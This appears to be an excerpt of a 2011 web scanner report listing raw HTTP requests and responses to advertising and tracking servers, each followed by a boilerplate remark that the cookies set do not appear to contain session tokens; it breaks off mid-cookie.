HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Location: http://ib.adnxs.com/getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= Date: Tue, 26 Apr 2011 18:46:42 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=9175 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; sess=1; uuid2=2724386019227846218
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1kUGf3P4S?x+>Vw#cli2Z%p3WmmQhjt9MdR#CxpF6tp*nq$Nxn<dWF!:QuYDKdseP_h)uJe.26/RX:N1BgJ?D-*wIgTR/'8!kfN=J6^H8$U<*(w#7`hLjeYl`CzVfnEs:6dsF57[+':o@4PCJUi>9^(fHj)#VwSLH:#4Gb1k`'//CV4WLv$glv8CT]v>0DbsqTI#+-X7W>Ick`C7pBmAXmXxR%ge`0M8X/f>NDHX+iEoDQSm4qj@!8HjdgqcY^7cwxlrbWW:X.i/bHKf_o_YEA/LyW)hFu@1/olvQM>q')Qb)rauFa94KII4KAI`UVZW5QvvWInWXio#:w1_scIl_O'$PK*w_BY.U##!MuX+Vqi8H11nF6CJf8gn+.75!Vt'v0`4hVA16S.*3^U5iP>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[WT6aI@mq; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 18:46:44 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Segment.aspx?sid=93da1b37-e1d8-4a3d-98bc-070baa31f827 HTTP/1.1 Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252; domain=.interclick.com; expires=Mon, 26-Apr-2021 20:05:54 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Tue, 26 Apr 2011 20:05:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw HTTP/1.1 Host: image2.pubmatic.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:46:40 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451600; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=unponl_cs=1&betq=8288=401583 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; F1=BIaw02E; ROLL=boAno2yqJFBg26I!; C2=wGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpBwVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAXqHgwzeZAc; GUID=MTMwMzY5MTY5NjsxOjE2cjRvcHExdHZsa21sOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 26 Apr 2011 18:46:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=HMxtN5pqGIxFGFuovcg3sYkhSK8BItdByeQ3WXgsHMa4FI7BKGeByeQ3gZgs1q6BaMrRGW7qHEysGIbkBcAoNXs2xOyBsRphy2I9HsfzF18i4eQBwW04w65BvHphxXJ9HsuoGN+kQdANZXY8s6+BBMnhxTrcHsNrGGfqHcwzeZY8gCGCvCiBwB; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/ Set-Cookie: GUID=MTMwMzg0MzU5MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Tue, 26 Apr 2011 19:46:31 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1 Host: m.adnxs.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 18:41:02 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1 Host: m.adnxs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Date: Tue, 26 Apr 2011 18:39:22 GMT Content-Length: 2226
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home HTTP/1.1 Host: msn.careerbuilder.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 0 Location: http://msn.careerbuilder.com/msn/default.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=fe081d7e64674f419a28ec11735cd32a-357143949-XH-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1B5CE6DB054A3B8D6808870DFF00DA75B99AE633E9DEE927EA50B31042D43B26AD80CE6783B23EC02694EF5309ECC424A; domain=.careerbuilder.com; expires=Thu, 26-Apr-2012 18:39:09 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB48 Date: Tue, 26 Apr 2011 18:39:08 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bht/?px=20&v=1&rnd=1303843577231 HTTP/1.1 Host: p.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: LO=00MD66Bgm1.00CK000J08NhNS1; Domain=.opt.fimserve.com; Expires=Tue, 26-Jul-2011 18:46:21 GMT; Path=/ Content-Type: text/html Content-Length: 0 Date: Tue, 26 Apr 2011 18:46:20 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303691668
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71ef 29167 Cache-Control: no-cache Content-Type: text/javascript P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Tue, 26 Apr 2011 18:46:16 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Connection: Keep-Alive Set-Cookie: ts=1303843576; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 18:46:16 GMT Content-Length: 2116
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=803168029;fpan=0;fpa=P0-2123435684-1303854386635;ns=0;url=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303854387569;tzo=300;a=p-3ayZhMX92Pd1o HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA
Response
HTTP/1.1 302 Found Connection: close Location: http://ad.yieldmanager.com/pixel?id=977076&id=755565&id=744649&id=1056982&id=1056950&id=1056980&id=1056949&id=744655&t=2 Set-Cookie: d=EF0AFu8kjVmtjIMLyxuBAXABzQaB0QDe0k_Boc0jjUKjsY5cH0L-EZIMuBfDCDgYgSIMEDDoQPGRggGhjjH_EADokgAQLbZ6Qw; expires=Mon, 25-Jul-2011 21:46:17 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Tue, 26 Apr 2011 21:46:17 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=7zRdy3HvetQzzJrusGV0WgUYWXerDbWSrgMFxw-mCPoYOsR8WF6iMILz5GrRaTzYj9ILcvkNLozW5XfQm-OIAw&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtS